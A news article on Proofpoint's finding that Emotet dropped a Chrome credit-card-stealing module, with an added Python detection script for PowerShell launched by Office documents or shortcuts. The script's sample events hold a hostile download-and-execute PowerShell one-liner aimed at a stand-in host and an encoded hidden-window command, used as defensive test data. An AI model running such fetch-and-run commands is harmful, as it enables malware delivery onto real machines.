Those responsible for the Emotet malware want to take advantage of operating one of the most widespread malware families in the world to steal credit card data saved in Google Chrome. In yet another expansion of the malware's capabilities, security experts have detected the download of a new malicious module that copies the card information stored in the browser and sends it to the criminals via command and control servers.
The practice was first detected last Monday (June 6) by experts from Proofpoint's threat insight team. The credit card stealer was downloaded through the botnet that serves Emotet and specifically targeted Google Chrome, a choice that reflects the browser's popularity. The experts also point out that the stolen data is sent to servers different from those used by the module loader, a way of making blocking more difficult.
This is yet another evolution of a threat that recently expanded its dissemination and infection capabilities after adopting a 64-bit architecture. The change increased the spread of Emotet around the world by up to 10 times, and more recently the criminals who distribute it have also turned to lures built on Windows shortcuts, as awareness grows of threats delivered through Office documents with malicious macros.
On June 6th, Proofpoint observed a new #Emotet module being dropped by the E4 botnet. To our surprise it was a credit card stealer that was solely targeting the Chrome browser. Once card details were collected they were exfiltrated to different C2 servers than the module loader. pic.twitter.com/zy92TyYKzs
— Threat Insight (@threatinsight) June 7, 2022
Such malicious files run PowerShell commands on Windows that download Emotet along with the modules needed for whatever attack its operators want to run. The roster of threats is large and has been expanding and evolving since 2014, when the malware first emerged; to this day it is one of the most widespread malware families in the world, and it can also be used to steal data, obtain footholds in systems and move laterally, increasing its spread on its own.
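The delivery chain described above (an Office document or a Windows shortcut that launches PowerShell, which in turn downloads the malware) leaves a recognisable trace in process-creation telemetry. The following detection logic is an added example written for this article, not code from Proofpoint or from the article itself: it scans constructed process-creation records in a simplified "parent|child|command line" format (the field names and the sample lines are assumptions; real sources such as Sysmon Event ID 1 carry the same fields) and flags PowerShell launched from an Office application or from Explorer when the command line shows download, encoded-command, or hidden-window indicators.

```python
"""Added example, not from the article: flag process-creation events where an
Office application or a shortcut launch (via explorer.exe) spawns PowerShell
with download or encoded-command indicators."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample events (assumed format "parent|child|command line").
SAMPLE_EVENTS = [
    "WINWORD.EXE|powershell.exe|powershell -w hidden -enc SQBFAFgA",
    "explorer.exe|cmd.exe|cmd /c start /min powershell -NoP -c IEX "
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')",
    "explorer.exe|powershell.exe|powershell -NoProfile Get-ChildItem C:\\Users",
    "EXCEL.EXE|splwow64.exe|C:\\Windows\\splwow64.exe 12288",
    "svchost.exe|powershell.exe|powershell -File C:\\scripts\\backup.ps1",
]

# Parents that should rarely need to spawn PowerShell: Office applications
# (macro case) and explorer.exe (a double-clicked .lnk launches through it).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHORTCUT_PARENTS = {"explorer.exe"}

# Command-line indicators, each paired with a human-readable reason.
INDICATORS = [
    (re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b"), "encoded command"),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin"),
     "download cmdlet"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "invoke-expression"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
]


@dataclass
class Finding:
    parent: str
    reasons: list[str]
    command_line: str


def parse_event(line: str) -> tuple[str, str, str]:
    """Split one record into (parent, child, command line); names lower-cased."""
    parent, child, cmdline = line.split("|", 2)
    return parent.lower(), child.lower(), cmdline


def analyze_event(line: str) -> Finding | None:
    """Return a Finding when a suspicious parent launches PowerShell with at
    least one indicator; None for everything else (including benign admin use)."""
    parent, child, cmdline = parse_event(line)
    if parent not in OFFICE_PARENTS | SHORTCUT_PARENTS:
        return None
    # The shortcut case often goes explorer -> cmd -> powershell, so look at
    # the command line as well as the direct child image name.
    if "powershell" not in child and "powershell" not in cmdline.lower():
        return None
    reasons = [label for pattern, label in INDICATORS if pattern.search(cmdline)]
    return Finding(parent, reasons, cmdline) if reasons else None


def analyze_events(lines: list[str]) -> list[Finding]:
    """Run analyze_event over a batch and keep only the hits."""
    return [f for f in (analyze_event(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(f"{finding.parent}: {', '.join(finding.reasons)} :: {finding.command_line}")
```

Only the two constructed lines that match the delivery pattern (macro-launched encoded PowerShell, and a shortcut-launched download-and-execute one-liner) are reported; a plain Explorer-launched PowerShell session and a scheduled backup script are left alone, which is the balance a production rule needs to keep the alert volume usable.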
Not even the actions of the authorities last year were able to stop the evolution of Emotet, which not only did not cease to exist but has been gaining more and more capabilities. A partnership with the cybercriminal group behind TrickBot, for example, allowed the necessary infrastructure to stay online even in the face of police operations, while its operators continue to update the malware and sell it to third parties interested in carrying out attacks.
How to avoid Emotet virus infection?
Although the malware's capabilities are highly advanced, its method of dissemination still depends largely on attachments sent by email or on fraudulent messages posted on social media or sent through messaging applications. These should be the focus of users' attention: avoid clicking links and downloading files received through these channels so as not to infect your own machine.
The warning applies especially to corporate users. Keeping security software on the computer also helps to prevent such compromises, while enterprise environments should have systems for monitoring and hunting for suspicious activity, as well as threat removal tools.